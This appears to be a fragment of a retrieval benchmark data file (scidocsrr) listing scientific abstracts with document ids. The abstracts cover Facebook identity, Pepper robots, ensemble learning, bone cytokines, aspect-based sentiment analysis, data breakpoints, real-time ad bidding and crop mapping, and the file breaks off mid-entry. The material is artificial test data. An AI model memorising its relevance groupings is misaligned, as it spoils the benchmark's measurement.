"text": "Early research on online self-presentation mostly focused on identity constructions in anonymous online environments. Such studies found that individuals tended to engage in role-play games and anti-normative behaviors in the online world. More recent studies have examined identity performance in less anonymous online settings such as Internet dating sites and reported different findings. The present study investigates identity construction on Facebook, a newly emerged nonymous online environment. Based on content analysis of 63 Facebook accounts, we find that the identities produced in this nonymous environment differ from those constructed in the anonymous online environments previously reported. Facebook users predominantly claim their identities implicitly rather than explicitly; they ‘‘show rather than tell” and stress group and consumer identities over personally narrated ones. The characteristics of such identities are described and the implications of this finding are discussed. Published by Elsevier Ltd.",
"title": ""
},
{
"docid": "ae20a0ba3b3a5d95a716025391acd1a4",
"text": "This paper summarizes authors' experience with the operation of both versions of autonomous humanoid robot Pepper. The robot's construction, as well as its capabilities and limitations are discussed and compared to the NAO robot. Practical background of working with Pepper robots and several years of experience with NAO, result in specific know-how, which the authors would like to share in this article. It reviews not only the robots' technical aspects, but also practical use-cases that the robot has proven to be perfect for (or not).",
"title": ""
},
{
"docid": "3f45d5b611b59e0bcaa0ff527d11f5af",
"text": "Ensemble methods use multiple models to get better performance. Ensemble methods have been used in multiple research fields such as computational intelligence, statistics and machine learning. This paper reviews traditional as well as state-of-the-art ensemble methods and thus can serve as an extensive summary for practitioners and beginners. The ensemble methods are categorized into conventional ensemble methods such as bagging, boosting and random forest, decomposition methods, negative correlation learning methods, multi-objective optimization based ensemble methods, fuzzy ensemble methods, multiple kernel learning ensemble methods and deep learning based ensemble methods. Variations, improvements and typical applications are discussed. Finally this paper gives some recommendations for future research directions.",
"title": ""
},
{
"docid": "c96e8afc0c3e0428a257ba044cd2a35a",
"text": "The tumor necrosis factor ligand superfamily member receptor activator of nuclear factor-kB (NF-kB) ligand (RANKL), its cellular receptor, receptor activator of NF-kB (RANK), and the decoy receptor, osteoprotegerin (OPG) represent a novel cytokine triad with pleiotropic effects on bone metabolism, the immune system, and endocrine functions (1). RANKL is produced by osteoblastic lineage cells and activated T lymphocytes (2– 4) and stimulates its receptor, RANK, which is located on osteoclasts and dendritic cells (DC) (4, 5). The effects of RANKL within the skeleton include osteoblast –osteoclast cross-talks, resulting in enhanced differentiation, fusion, activation, and survival of osteoclasts (3, 6), while in the immune system, RANKL promotes the survival and immunostimulatory capacity of DC (1, 7). OPG acts as a soluble decoy receptor that neutralizes RANKL, thus preventing activation of RANK (8). The RANKL/RANK/OPG system has been implicated in various skeletal and immune-mediated diseases characterized by increased bone resorption and bone loss, including several forms of osteoporosis (postmenopausal, glucocorticoid-induced, and senile osteoporosis) (9), bone metastases (10), periodontal disease (11), and rheumatoid arthritis (2). While a relative deficiency of OPG has been found to be associated with osteoporosis in various animal models (9), the parenteral administration of OPG to postmenopausal women (3 mg/kg) was beneficial in rapidly reducing enhanced biochemical markers of bone turnover by 30–80% (12). These studies have clearly established the RANKL/ OPG system as a key cytokine network involved in the regulation of bone cell biology, osteoblast–osteoclast and bone-immune cross-talks, and maintenance of bone mass. In addition to providing substantial and detailed insights into the pathogenesis of various metabolic bone diseases, the administration of OPG may become a promising therapeutic option in the prevention and treatment of benign and malignant bone disease. Several studies have attempted to evaluate the clinical relevance and potential applications of serum OPG measurements in humans. Yano et al. were the first to assess systematically OPG serum levels (by an ELISA system) in women with osteoporosis (13). Intriguingly, OPG serum levels were negatively correlated with bone mineral density (BMD) at various sites (lumbar spine, femoral neck, and total body) and positively correlated with biochemical markers of bone turnover. In view of the established protective effects of OPG on bone, these findings came as a surprise, and were interpreted as an insufficient counter-regulatory mechanism to prevent bone loss. Another group which employed a similar design (but a different OPG ELISA system) could not detect a correlation between OPG serum levels and biochemical markers of bone turnover (14), but confirmed the negative correlation of OPG serum concentrations with BMD in postmenopausal women (15). In a recent study, Szulc and colleagues (16) evaluated OPG serum levels in an age-stratified male cohort, and observed positive correlations of OPG serum levels with bioavailable testosterone and estrogen levels, negative correlations with parathyroid hormone (PTH) serum levels and urinary excretion of total deoxypyridinoline, but no correlation with BMD at any site (16). 
The finding that PTH serum levels and gene expression of OPG by bone cells are inversely correlated was also reported in postmenopausal women (17), and systemic administration of human PTH(1-34) to postmenopausal women with osteoporosis inhibited circulating OPG serum levels (18). Finally, a study of patients with renal diseases showed a decline of serum OPG levels following initiation of systemic glucocorticoid therapy (19). The regulation pattern of OPG by systemic hormones has been described in vitro, and has led to the hypothesis that most hormones and cytokines regulate bone resorption by modulating either RANKL, OPG, or both (9). Interestingly, several studies showed that serum OPG levels increased with ageing and were higher in postmenopausal women (who have an increased rate of bone loss) as compared with men, thus supporting the hypothesis of a counter-regulatory function of OPG in order to prevent further bone loss (13–16). In this issue of the Journal, Ueland and associates (20) add another important piece to the picture of OPG regulation in humans in vivo. By studying well-characterized patient cohorts with endocrine and immune diseases such as Cushing’s syndrome, acromegaly, growth hormone deficiency, HIV infection, and common variable immunodeficiency (CVI), the investigators reported",
"title": ""
},
{
"docid": "a1581dfaaa165f93f4ef9cd8e31d6d6b",
"text": "With increasing number of web services, providing an end-to-end Quality of Service (QoS) guarantee in responding to user queries is becoming an important concern. Multiple QoS parameters (e.g., response time, latency, throughput, reliability, availability, success rate) are associated with a service, thereby, service composition with a large number of candidate services is a challenging multi-objective optimization problem. In this paper, we study the multi-constrained multi-objective QoS aware web service composition problem and propose three different approaches to solve the same, one optimal, based on Pareto front construction and two other based on heuristically traversing the solution space. We compare the performance of the heuristics against the optimal, and show the effectiveness of our proposals over other classical approaches for the same problem setting, with experiments on WSC-2009 and ICEBE-2005 datasets.",
"title": ""
},
{
"docid": "8c09ff5c2ee6da7a2cd4dbdec527aeda",
"text": "Charitable crowdfunding is a burgeoning online micro charity paradigm where fund seekers request micro donations from a large group of potential funders. Despite micro charities have gone digital for more than a decade, our knowledge on individuals’ donation behavior in online micro charities (e.g., charitable crowdfunding) remains limited. To fill this gap, this study develops a model that explains individuals’ donation behavior in charitable crowdfunding. Our model was tested using data collected from 205 individuals who have read charitable crowdfunding projects. The results reveal that empathy and perceived credibility of charitable crowdfunding jointly determine a funder’s intention to donate money. Furthermore, website quality and project content quality positively influence both empathy and perceived credibility. Also noteworthy is that initiator reputation is positively related to perceived credibility while project popularity is positively associated with empathy. The findings contribute to a more nuanced understanding of individuals’ donation behavior in online micro charities.",
"title": ""
},
{
"docid": "bb711ff76d681d3c51e5c667bdb77bf5",
"text": "One of the major problems with electric vehicles is the battery. The battery must be adequately monitored in order to optimize its performances and to maximize its life, to know when it's time to recharge it, or when the charging has been completed, or it's time to buy a new one. The battery's monitoring is the goal of the battery management system (BMS), which must be carefully designed. Moreover, the BMS must report its data to the outer world, and this means that it cannot work alone. If we want to use some kind of simulation to help the design of an effective BMS, we need a simulation model that can be easily attached to other hardware simulation models, such as CAN bus' or Bluetooth models. In this work we present and validate a BMS SystemC simulation model. Both the design and the validation of this BMS are carried on using real-world scenarios and data.",
"title": ""
},
{
"docid": "b7a229f801666b8fdb6ac65321556883",
"text": "INTRODUCTION\nThis in vivo study compared the antibacterial effects of 2 instrumentation systems in root canal-treated teeth with apical periodontitis.\n\n\nMETHODS\nForty-eight teeth with a single root and a single canal showing post-treatment apical periodontitis were selected for this study. For retreatment, teeth were randomly divided into 2 groups according to the instrumentation system used: Self-Adjusting File (SAF; ReDent-Nova, Ra'anana, Israel) and Twisted File Adaptive (TFA; SybronEndo, Orange, CA). In both groups, 2.5% sodium hypochlorite was the irrigant. Bacteriological samples were taken before (S1) and after chemomechanical preparation (S2). In the TFA group, passive ultrasonic irrigation (PUI) was performed after instrumentation, and samples were also taken after this supplementary step (S2b). DNA was extracted from the clinical samples and subjected to quantitative real-time polymerase chain reaction to evaluate the levels of total bacteria, streptococci, and Enterococcus faecalis. Statistical analyses from quantitative real-time polymerase chain reaction data were performed within groups using the Wilcoxon matched pairs test and between groups using the Mann-Whitney U test and the Fisher exact test with the significance level set at P < .05.\n\n\nRESULTS\nBacteria were detected in S1 samples from 43 teeth, which were then included in the antibacterial experiment. Both SAF and TFA instrumentation protocols showed a highly significant intracanal bacterial reduction (P < .001). Intergroup quantitative comparisons disclosed no significant differences between TFA with or without PUI and SAF (P > .05). PUI did not result in significant improvement in disinfection (P > .05).\n\n\nCONCLUSIONS\nBoth instrumentation systems/treatment protocols were highly effective in significantly reducing the intracanal bacterial counts. No significant difference was observed between the 2 systems in disinfecting the canals of teeth with post-treatment apical periodontitis.",
"title": ""
},
{
"docid": "97cb28977a036925fe6d3b00643bea22",
"text": "Along with the blossom of open source projects comes the convenience for software plagiarism. A company, if less self-disciplined, may be tempted to plagiarize some open source projects for its own products. Although current plagiarism detection tools appear sufficient for academic use, they are nevertheless short for fighting against serious plagiarists. For example, disguises like statement reordering and code insertion can effectively confuse these tools. In this paper, we develop a new plagiarism detection tool, called GPLAG, which detects plagiarism by mining program dependence graphs (PDGs). A PDG is a graphic representation of the data and control dependencies within a procedure. Because PDGs are nearly invariant during plagiarism, GPLAG is more effective than state-of-the-art tools for plagiarism detection. In order to make GPLAG scalable to large programs, a statistical lossy filter is proposed to prune the plagiarism search space. Experiment study shows that GPLAG is both effective and efficient: It detects plagiarism that easily slips over existing tools, and it usually takes a few seconds to find (simulated) plagiarism in programs having thousands of lines of code.",
"title": ""
}
] | scidocsrr |
d3de2528dace8261ed384f8d23b293bb | XRCE at SemEval-2016 Task 5: Feedbacked Ensemble Modeling on Syntactico-Semantic Knowledge for Aspect Based Sentiment Analysis | [
{
"docid": "640b6328fe2a44d56fa9d7d2bf61798d",
"text": "This paper describes our participation in SemEval-2015 Task 12, and the opinion mining system sentiue. The general idea is that systems must determine the polarity of the sentiment expressed about a certain aspect of a target entity. For slot 1, entity and attribute category detection, our system applies a supervised machine learning classifier, for each label, followed by a selection based on the probability of the entity/attribute pair, on that domain. The target expression detection, for slot 2, is achieved by using a catalog of known targets for each entity type, complemented with named entity recognition. In the opinion sentiment slot, we used a 3 class polarity classifier, having BoW, lemmas, bigrams after verbs, presence of polarized terms, and punctuation based features. Working in unconstrained mode, our results for slot 1 were assessed with precision between 57% and 63%, and recall varying between 42% and 47%. In sentiment polarity, sentiue’s result accuracy was approximately 79%, reaching the best score in 2 of the 3 domains.",
"title": ""
},
{
"docid": "69d65a994d5b5c412ee6b8a266cb9b31",
"text": "This paper describes our system used in the Aspect Based Sentiment Analysis Task 4 at the SemEval-2014. Our system consists of two components to address two of the subtasks respectively: a Conditional Random Field (CRF) based classifier for Aspect Term Extraction (ATE) and a linear classifier for Aspect Term Polarity Classification (ATP). For the ATE subtask, we implement a variety of lexicon, syntactic and semantic features, as well as cluster features induced from unlabeled data. Our system achieves state-of-the-art performances in ATE, ranking 1st (among 28 submissions) and 2rd (among 27 submissions) for the restaurant and laptop domain respectively.",
"title": ""
}
] | [
{
"docid": "de26ff58b4786fb43dea7271c8eb207d",
"text": "In this paper, we present QSEGMENT, a real-life query segmentation system for eCommerce queries. QSEGMENT uses frequency data from the query log which we call buyers' data and also frequency data from product titles what we call sellers' data. We exploit the taxonomical structure of the marketplace to build domain specific frequency models. Using such an approach, QSEGMENT performs better than previously described baselines for query segmentation. Also, we perform a large scale evaluation by using an unsupervised IR metric which we refer to as user-intent-score. We discuss the overall architecture of QSEGMENT as well as various use cases and interesting observations around segmenting eCommerce queries.",
"title": ""
},
{
"docid": "ee4b8d8e9fdc77ce3f8278f0563d8638",
"text": "A data breakpoint associates debugging actions with programmer-specified conditions on the memory state of an executing program. Data breakpoints provide a means for discovering program bugs that are tedious or impossible to isolate using control breakpoints alone. In practice, programmers rarely use data breakpoints, because they are either unimplemented or prohibitively slow in available debugging software. In this paper, we present the design and implementation of a practical data breakpoint facility.\nA data breakpoint facility must monitor all memory updates performed by the program being debugged. We implemented and evaluated two complementary techniques for reducing the overhead of monitoring memory updates. First, we checked write instructions by inserting checking code directly into the program being debugged. The checks use a segmented bitmap data structure that minimizes address lookup complexity. Second, we developed data flow algorithms that eliminate checks on some classes of write instructions but may increase the complexity of the remaining checks.\nWe evaluated these techniques on the SPARC using the SPEC benchmarks. Checking each write instruction using a segmented bitmap achieved an average overhead of 42%. This overhead is independent of the number of breakpoints in use. Data flow analysis eliminated an average of 79% of the dynamic write checks. For scientific programs such the NAS kernels, analysis reduced write checks by a factor of ten or more. On the SPARC these optimizations reduced the average overhead to 25%.",
"title": ""
},
{
"docid": "4843d4b24161d1dd594d2c0a0fb61ef1",
"text": "Cells release nano-sized membrane vesicles that are involved in intercellular communication by transferring biological information between cells. It is generally accepted that cells release at least three types of extracellular vesicles (EVs): apoptotic bodies, microvesicles and exosomes. While a wide range of putative biological functions have been attributed to exosomes, they are assumed to represent a homogenous population of EVs. We hypothesized the existence of subpopulations of exosomes with defined molecular compositions and biological properties. Density gradient centrifugation of isolated exosomes revealed the presence of two distinct subpopulations, differing in biophysical properties and their proteomic and RNA repertoires. Interestingly, the subpopulations mediated differential effects on the gene expression programmes in recipient cells. In conclusion, we demonstrate that cells release distinct exosome subpopulations with unique compositions that elicit differential effects on recipient cells. Further dissection of exosome heterogeneity will advance our understanding of exosomal biology in health and disease and accelerate the development of exosome-based diagnostics and therapeutics.",
"title": ""
},
{
"docid": "3fdbc95278be466b6ee0906e329a8e49",
"text": "Currently, polymer-based prefillable syringes are being promoted to the pharmaceutical market because they provide an increased break resistance relative to traditionally used glass syringes. Despite this significant advantage, the possibility that barrel material can affect the oligomeric state of the protein drug exists. The present study was designed to compare the effect of different syringe materials and silicone oil lubrication on the protein aggregation. The stability of a recombinant fusion protein, abatacept (Orencia), and a fully human recombinant immunoglobulin G1, adalimumab (Humira), was assessed in silicone oil-free (SOF) and silicone oil-lubricated 1-mL glass syringes and polymer-based syringes in accelerated stress study. Samples were subjected to agitation stress, and soluble aggregate levels were evaluated by size-exclusion chromatography and verified with analytical ultracentrifugation. In accordance with current regulatory expectations, the amounts of subvisible particles resulting from agitation stress were estimated using resonant mass measurement and dynamic flow-imaging analyses. The amount of aggregated protein and particle counts were similar between unlubricated polymer-based and glass syringes. The most significant protein loss was observed for lubricated glass syringes. These results suggest that newly developed SOF polymer-based syringes are capable of providing biopharmaceuticals with enhanced physical stability upon shipping and handling.",
"title": ""
},
{
"docid": "bcf1f9c23e790bda059603f98dcb1fea",
"text": "Hurdle technology is used in industrialized as well as in developing countries for the gentle but effective preservation of foods. Hurdle technology was developed several years ago as a new concept for the production of safe, stable, nutritious, tasty, and economical foods. Previously hurdle technology, i.e., a combination of preservation methods, was used empirically without much knowledge of the governing principles. The intelligent application of hurdle technology has become more prevalent now, because the principles of major preservative factors for foods (e.g., temperature, pH, aw, Eh, competitive flora), and their interactions, became better known. Recently, the influence of food preservation methods on the physiology and behavior of microorganisms in foods, i.e. their homeostasis, metabolic exhaustion, stress reactions, are taken into account, and the novel concept of multi-target food preservation emerged. The present contribution reviews the concept of the potential hurdles for foods, the hurdle effect, and the hurdle technology for the prospects of the future goal of a multi-target preservation of foods.",
"title": ""
},
{
"docid": "0b8ec67f285c4186866f42305dfb7cf2",
"text": "Some deep convolutional neural networks were proposed for time-series classification and class imbalanced problems. However, those models performed degraded and even failed to recognize the minority class of an imbalanced temporal sequences dataset. Minority samples would bring troubles for temporal deep learning classifiers due to the equal treatments of majority and minority class. Until recently, there were few works applying deep learning on imbalanced time-series classification (ITSC) tasks. Here, this paper aimed at tackling ITSC problems with deep learning. An adaptive cost-sensitive learning strategy was proposed to modify temporal deep learning models. Through the proposed strategy, classifiers could automatically assign misclassification penalties to each class. In the experimental section, the proposed method was utilized to modify five neural networks. They were evaluated on a large volume, real-life and imbalanced time-series dataset with six metrics. Each single network was also tested alone and combined with several mainstream data samplers. Experimental results illustrated that the proposed costsensitive modified networks worked well on ITSC tasks. Compared to other methods, the cost-sensitive convolution neural network and residual network won out in the terms of all metrics. Consequently, the proposed cost-sensitive learning strategy can be used to modify deep learning classifiers from cost-insensitive to costsensitive. Those cost-sensitive convolutional networks can be effectively applied to address ITSC issues.",
"title": ""
},
{
"docid": "604957d090fa49a1de23e22304c297d1",
"text": "This paper describes the development of a test bed for an on-drone computation system, in which the drone plays the game of ping-pong competitively (YCCD: The Yorktown Cognitive Competition Drone). Unlike other drone systems and demonstrators YCCD will be completely autonomous with no external support from cameras, servers, GPS etc. YCCD will have ultra-low power computation capabilities including on-drone real-time processing for vision and localization (non-GPS based). Architectural design and processing algorithms of the system are discussed in detail.",
"title": ""
},
{
"docid": "bf445955186e2f69f4ef182850090ffc",
"text": "The majority of online display ads are served through real-time bidding (RTB) --- each ad display impression is auctioned off in real-time when it is just being generated from a user visit. To place an ad automatically and optimally, it is critical for advertisers to devise a learning algorithm to cleverly bid an ad impression in real-time. Most previous works consider the bid decision as a static optimization problem of either treating the value of each impression independently or setting a bid price to each segment of ad volume. However, the bidding for a given ad campaign would repeatedly happen during its life span before the budget runs out. As such, each bid is strategically correlated by the constrained budget and the overall effectiveness of the campaign (e.g., the rewards from generated clicks), which is only observed after the campaign has completed. Thus, it is of great interest to devise an optimal bidding strategy sequentially so that the campaign budget can be dynamically allocated across all the available impressions on the basis of both the immediate and future rewards. In this paper, we formulate the bid decision process as a reinforcement learning problem, where the state space is represented by the auction information and the campaign's real-time parameters, while an action is the bid price to set. By modeling the state transition via auction competition, we build a Markov Decision Process framework for learning the optimal bidding policy to optimize the advertising performance in the dynamic real-time bidding environment. Furthermore, the scalability problem from the large real-world auction volume and campaign budget is well handled by state value approximation using neural networks. The empirical study on two large-scale real-world datasets and the live A/B testing on a commercial platform have demonstrated the superior performance and high efficiency compared to state-of-the-art methods.",
"title": ""
},
{
"docid": "214d1911eb4c439402d3b5a81eebf647",
"text": "Crop type mapping and studying the dynamics of agricultural fields in arid and semi-arid environments are of high importance since these ecosystems have witnessed an unprecedented rate of area decline during the last decades. Crop type mapping using medium spatial resolution imagery data has been considered as one of the most important management tools. Remotely sensed data provide reliable, cost and time effective information for monitoring, analyzing and mapping of agricultural land areas. This research was conducted to explore the utility of Landsat 8 imagery data for crop type mapping in a highly fragmented and heterogeneous agricultural landscape in Najaf-Abad Hydrological Unit, Iran. Based on the phenological information from long-term field surveys, five Landsat 8 image scenes (from March to October) were processed to classify the main crop types. In this regard, wheat, barley, alfalfa, and fruit trees have been classified applying inventive decision tree algorithms and Support Vector Machine was used to categorize rice, potato, vegetables, and greenhouse vegetable crops. Accuracy assessment was then undertaken based on spring and summer crop maps (two confusion matrices) that resulted in Kappa coefficients of 0.89. The employed images and classification methods could form a basis for better crop type mapping in central Iran that is undergoing severe drought condition. 2016 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "6377b90960aaaf2e815339a3315d72cd",
"text": "Coronary artery disease (CAD) is one of the most common causes of death worldwide. In the last decade, significant advancements in CAD treatment have been made. The existing treatment is medical, surgical or a combination of both depending on the extent, severity and clinical presentation of CAD. The collaboration between different science disciplines such as biotechnology and tissue engineering has led to the development of novel therapeutic strategies such as stem cells, nanotechnology, robotic surgery and other advancements (3-D printing and drugs). These treatment modalities show promising effects in managing CAD and associated conditions. Research on stem cells focuses on studying the potential for cardiac regeneration, while nanotechnology research investigates nano-drug delivery and percutaneous coronary interventions including stent modifications and coatings. This article aims to provide an update on the literature (in vitro, translational, animal and clinical) related to these novel strategies and to elucidate the rationale behind their potential treatment of CAD. Through the extensive and continued efforts of researchers and clinicians worldwide, these novel strategies hold the promise to be effective alternatives to existing treatment modalities.",
"title": ""
},
{
"docid": "b5515ce58a5f40fb5129560c9bdc3b10",
"text": "Lipoid pneumonia in children follows mineral oil aspiration and may result in acute respiratory failure. Majority of the patients recover without long-term morbidity, though a few may be left with residual damage to the lungs. We report a case of a two-and-a-half-year-old child with persistent lipoid pneumonia following accidental inhalation of machine oil, who was successfully treated with steroids.",
"title": ""
},
{
"docid": "41f12dbb82a44862ff50b3ba1ca8dd8c",
"text": "We present Neural Image Compression (NIC), a method to reduce the size of gigapixel images by mapping them to a compact latent space using neural networks. We show that this compression allows us to train convolutional neural networks on histopathology whole-slide images end-to-end using weak image-level labels.",
"title": ""
},
{
"docid": "f9c8209fcecbbed99aa29761dffc8e25",
"text": "ImageNet is a large-scale database of object classes with millions of images. Unfortunately only a small fraction of them is manually annotated with bounding-boxes. This prevents useful developments, such as learning reliable object detectors for thousands of classes. In this paper we propose to automatically populate ImageNet with many more bounding-boxes, by leveraging existing manual annotations. The key idea is to localize objects of a target class for which annotations are not available, by transferring knowledge from related source classes with available annotations. We distinguish two kinds of source classes: ancestors and siblings. Each source provides knowledge about the plausible location, appearance and context of the target objects, which induces a probability distribution over windows in images of the target class. We learn to combine these distributions so as to maximize the location accuracy of the most probable window. Finally, we employ the combined distribution in a procedure to jointly localize objects in all images of the target class. Through experiments on 0.5 million images from 219 classes we show that our technique (i) annotates a wide range of classes with bounding-boxes; (ii) effectively exploits the hierarchical structure of ImageNet, since all sources and types of knowledge we propose contribute to the results; (iii) scales efficiently.",
"title": ""
},
{
"docid": "23567568ccfb1f97f5fb5b35460fe063",
"text": "Sportsman (sports) hernia is a medially located bulge in the posterior wall of the inguinal canal that is common in football players. About 90% of cases occur in males. The injury is also found in the general population. The presenting symptom is chronic groin pain which develops during exercise, aggravated by sudden movements, accompanied by subtle physical examination findings and a medial inguinal bulge on ultrasound. Pain persists after a game, abates during a period of lay-off, but returns on the resumption of sport. Frequently, sports hernia is one component of a more extensive pattern of injury known as ‘groin disruption injury’ consisting of osteitis pubis, conjoint tendinopathy, adductor tendinopathy and obturator nerve entrapment. Certain risk factors have been identified, including reduced hip range of motion and poor muscle balance around the pelvis, limb length discrepancy and pelvic instability. The suggested aetiology of the injury is repetitive athletic loading of the symphysis pubis disc, leading to accelerated disc degeneration with consequent pelvic instability and vulnerability to micro-fracturing along the pubic osteochondral junction, periosteal stripping of the pubic ligaments and para-symphyseal tendon tears, causing tendon dysfunction. Diagnostic imaging includes an erect pelvic radiograph (X-ray) with flamingo stress views of the symphysis pubis, real-time ultrasound and, occasionally, computed tomography (CT) scanning and magnetic resonance imaging (MRI), but seldom contrast herniography. Other imaging tests occasionally performed can include nuclear bone scan, limb leg measurement and test injections of local anaesthetic/corticosteroid. The injury may be prevented by the detection and monitoring of players at risk and by correcting significant limb length inequality. Groin reconstruction operation consists of a Maloney darn hernia repair technique, repair of the conjoint tendon, transverse adductor tenotomy and obturator nerve release. Rehabilitation involves core stabilisation exercises and the maintenance of muscle control and strength around the pelvis. Using this regimen of groin reconstruction and post-operative rehabilitation, a player would be anticipated to return to their pre-injury level of activity approximately 3 months after surgery.",
"title": ""
},
{
"docid": "ad0ea5bd92d87bd055ec4321aa502987",
"text": "Context: Although metamodelling is generally accepted as important for our understanding of software and systems development, arguments about the validity and utility of ontological versus linguistic meta-",
"title": ""
},
{
"docid": "4b525d7c8cde7ad4f3f767d2534da63a",
"text": "As various consumers tend to use personalized Cloud services, Service Level Agreements (SLAs) emerge as a key aspect in Cloud and Utility computing. The objectives of this doctoral research are 1) to support a flexible establishment of SLAs that enhances the utility of SLAs for both providers and consumers, and 2) to manage Cloud resources to prevent SLA violations. Because consumers and providers may be independent bodies, some mechanisms are necessary to resolve different preferences when they establish a SLA. Thus, we designed a Cloud SLA negotiation mechanism for interactive and flexible SLA establishment. The novelty of this SLA negotiation mechanism is that it can support advanced multi-issue negotiation that includes time slot and price negotiations. In addition, to prevent SLA violations, we provided a SLA-driven resource allocation scheme that selects a proper data center among globally distributed centers operated by a provider. Empirical results showed that the proposed SLA negotiation mechanism supports faster agreements and achieves higher utilities. Also, the proposed SLA-driven resource allocation scheme performs better in terms of SLA violations and the provider's profits.",
"title": ""
},
{
"docid": "101309b306fa0b46100fc8c88ef05383",
"text": "The study area is located ~50 km in the north of Tehran capital city, Iran, and is a part of central Alborz Mountain. The intrusive bodies aged post Eocene have intruded in the Eocene volcanic units causing hydrothermal alterations in these units. Advanced Spaceborne Thermal Emission and Reflection Radiometer (ASTER) images were used to map hydrothermal alteration zones. The propylitic, phyllic and argillic alteration and iron oxide minerals identified using Spectral Angle Mapper (SAM) method. Structural lineaments were extracted from ASTER images by applying automatic lineament extraction processes and visual interpretations. An exploration model was considered based on previous studies, and appropriate evidence maps were generated, weighted and reclassified. Ore Forming Potential (OFP) map was generated by applying Fuzzy SUM operator on alteration and Pb, Cu, Ag, and Au geochemical anomaly maps. Finally, Host rock, geological structures and OFP were combined using Fuzzy Gamma operator (γ ) to produce mineral prospectivity map. Eventually, the conceptual model discussed here, fairly demonstrated the known hydrothermal gold deposits in the study area and could be a source for future detailed explorations.",
"title": ""
},
{
"docid": "36911701bcf6029eb796bac182e5aa4c",
"text": "In this paper, we describe the approaches taken in the 4WARD project to address the challenges of the network of the future. Our main hypothesis is that the Future Internet must allow for the fast creation of diverse network designs and paradigms, and must also support their co-existence at run-time. We observe that a pure evolutionary path from the current Internet design will not be able to address, in a satisfactory manner, major issues like the handling of mobile users, information access and delivery, wide area sensor network applications, high management complexity, and malicious traffic that hamper network performance already today. Moreover, the Internetpsilas focus on interconnecting hosts and delivering bits has to be replaced by a more holistic vision of a network of information and content. This is a natural evolution of scope requiring nonetheless a re-design of the architecture. We describe how 4WARD directs research on network virtualisation, novel InNetworkManagement, a generic path concept, and an information centric approach, into a single framework for a diversified, but interoperable, network of the future.",
"title": ""
},
{
"docid": "4a2303d673b146dc9c2849d743aaaaa2",
"text": "With the recent advances in information networks, the problem of community detection has attracted much attention in the last decade. While network community detection has been ubiquitous, the task of collecting complete network data remains challenging in many real-world applications. Usually the collected network is incomplete with most of the edges missing. Commonly, in such networks, all nodes with attributes are available while only the edges within a few local regions of the network can be observed. In this paper, we study the problem of detecting communities in incomplete information networks with missing edges. We first learn a distance metric to reproduce the link-based distance between nodes from the observed edges in the local information regions. We then use the learned distance metric to estimate the distance between any pair of nodes in the network. A hierarchical clustering approach is proposed to detect communities within the incomplete information networks. Empirical studies on real-world information networks demonstrate that our proposed method can effectively detect community structures within incomplete information networks.",
"title": ""
},
{
"docid": "f74cfc71a268b2155fe6920b00bc62d4",
"text": "The vaginal microbiome in healthy women changes over short periods of time, differs among individuals, and varies in its response to sexual intercourse.",
"title": ""
}
] | scidocsrr |
e6b482f0bd7b3238a6346266c21b4b44 | Context-aware Natural Language Generation for Spoken Dialogue Systems | [
{
"docid": "33468c214408d645651871bd8018ed82",
"text": "In this paper, we carry out two experiments on the TIMIT speech corpus with bidirectional and unidirectional Long Short Term Memory (LSTM) networks. In the first experiment (framewise phoneme classification) we find that bidirectional LSTM outperforms both unidirectional LSTM and conventional Recurrent Neural Networks (RNNs). In the second (phoneme recognition) we find that a hybrid BLSTM-HMM system improves on an equivalent traditional HMM system, as well as unidirectional LSTM-HMM.",
"title": ""
},
{
"docid": "6af09f57f2fcced0117dca9051917a0d",
"text": "We present a novel per-dimension learning rate method for gradient descent called ADADELTA. The method dynamically adapts over time using only first order information and has minimal computational overhead beyond vanilla stochastic gradient descent. The method requires no manual tuning of a learning rate and appears robust to noisy gradient information, different model architecture choices, various data modalities and selection of hyperparameters. We show promising results compared to other methods on the MNIST digit classification task using a single machine and on a large scale voice dataset in a distributed cluster environment.",
"title": ""
}
] | [
{
"docid": "acbdb3f3abf3e56807a4e7f60869a2ee",
"text": "In this paper we present a new approach to high quality 3D object reconstruction. Starting from a calibrated sequence of color images, the algorithm is able to reconstruct both the 3D geometry and the texture. The core of the method is based on a deformable model, which defines the framework where texture and silhouette information can be fused. This is achieved by defining two external forces based on the images: a texture driven force and a silhouette driven force. The texture force is computed in two steps: a multi-stereo correlation voting approach and a gradient vector flow diffusion. Due to the high resolution of the voting approach, a multi-grid version of the gradient vector flow has been developed. Concerning the silhouette force, a new formulation of the silhouette constraint is derived. It provides a robust way to integrate the silhouettes in the evolution algorithm. As a consequence, we are able to recover the apparent contours of the model at the end of the iteration process. Finally, a texture map is computed from the original images for the reconstructed 3D model.",
"title": ""
},
{
"docid": "b230400ee47b40751623561e11b1944c",
"text": "Many mHealth apps have been developed to assist people in self-care management. Most of them aim to engage users and provide motivation to increase adherence. Gamification has been introduced to identify the left and right brain drives in order to engage users and motivate them. We are using Octalysis framework to map how top rated stress management apps address the right brain drives. 12 stress management mHealth are classified based on this framework. In this paper, we explore how Gamification has been used in mHealth apps, the intrinsic motivation using self-determination theory, methodology, and findings. In the discussion, we identify design principles that will better suited to enhance intrinsic motivation for people who seek self-stress management.",
"title": ""
},
{
"docid": "9d210dc8bc48e4ff9bf72c260f169ada",
"text": "We introduce a formal model of teaching in which the teacher is tailored to a particular learner, yet the teaching protocol is designed so that no collusion is possible. Not surprisingly, such a model remedies the non-intuitive aspects of other models in which the teacher must successfully teach any consistent learner. We prove that any class that can be exactly identiied by a determin-istic polynomial-time algorithm with access to a very rich set of example-based queries is teachable by a computationally unbounded teacher and a polynomial-time learner. In addition, we present other general results relating this model of teaching to various previous results. We also consider the problem of designing teacher/learner pairs in which both the teacher and learner are polynomial-time algorithms and describe teacher/learner pairs for the classes of 1-decision lists and Horn sentences.",
"title": ""
},
{
"docid": "25d45edce51fcaddc991ae2e6154b743",
"text": "In this paper, we present an intuitive and controllable patch-based technique for terrain synthesis. Our method is based on classical patch-based texture synthesis approaches. It generates a new terrain model by combining patches extracted from a given set of exemplars, providing a control performed by a low frequency guide, a categorization of exemplars, and a map for distributing these categories. Furthermore, we propose criteria to validate the input, some structures to accelerate the patch choice, and a metric based on the process, these structures, and some specificities of the data.",
"title": ""
},
{
"docid": "586ea16456356b6301e18f39e50baa89",
